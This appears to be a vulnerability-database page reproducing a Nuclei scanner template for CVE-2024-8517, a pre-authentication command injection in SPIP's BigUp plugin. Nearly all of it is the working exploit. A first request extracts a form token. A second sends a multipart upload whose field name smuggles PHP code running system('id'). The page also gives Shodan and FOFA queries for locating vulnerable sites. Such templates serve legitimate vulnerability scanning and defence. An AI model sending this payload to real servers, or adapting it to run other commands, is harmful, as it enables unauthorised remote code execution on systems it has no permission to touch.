CVE-2024-8517: SPIP BigUp Plugin - Remote Code Execution

日期: 2025-08-01 | 影响软件: SPIP BigUp Plugin | POC: 已公开

漏洞描述

SPIP before 4.3.2, 4.2.16, and 4.1.18 is vulnerable to a command injection issue. A remote and unauthenticated attacker can execute arbitrary operating system commands by sending a crafted multipart file upload HTTP request.

PoC代码[已公开]

id: CVE-2024-8517

info:
  name: SPIP BigUp Plugin - Remote Code Execution
  author: DhiyaneshDk
  severity: critical
  description: |
    SPIP before 4.3.2, 4.2.16, and 4.1.18 is vulnerable to a command injection issue. A remote and unauthenticated attacker can execute arbitrary operating system commands by sending a crafted multipart file upload HTTP request.
  reference:
    - https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-2-SPIP-4-2-16-SPIP-4-1-18.html
    - https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_2_a_big_upload/
    - https://vulncheck.com/advisories/spip-upload-rce
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-8517
    cwe-id: CWE-646
    epss-score: 0.90372
    epss-percentile: 0.99584
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.favicon.hash:-1224668706
    fofa-query: "X-Spip-Cache"
  tags: cve,cve2024,intrusive,spip,rce

flow: http(1) && http(2)

variables:
  email: "{{randstr}}@{{rand_base(5)}}.com"
  string: "{{randstr}}"
  filename: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        GET /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'formulaire_action_args'
          - 'spip'
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        group: 1
        name: formulaire
        regex:
          - name=['"]formulaire_action_args['"]\s*type=['"]hidden['"]\s*value=['"]([^'"]+)['"]
        internal: true

  - raw:
      - |
        POST /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=5f02b65945d644d6a32847ab130e9586

        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="page"

        spip_pass
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="lang"

        fr
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="formulaire_action"

        oubli
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="formulaire_action_args"

        {{formulaire}}
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="formulaire_action_sign"


        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="oubli"

        {{email}}
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="nobot"


        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="bigup_retrouver_fichiers"

        a
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="RCE['.system('id').die().']"; filename="{{filename}}.txt"
        Content-Type: text/plain

        {{string}}
        --5f02b65945d644d6a32847ab130e9586--

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=[0-9]+.*gid=[0-9]+.*"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022045dd3455f526033b7c74ccedbcfb7a1cd1e98dd0773c54b7f447d1e81833d24a022100ce6fbe0ddedd3e0ac0d770311a2a4bd478e4509298d5468114d96729e45f5279:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-8517.yaml

相关漏洞推荐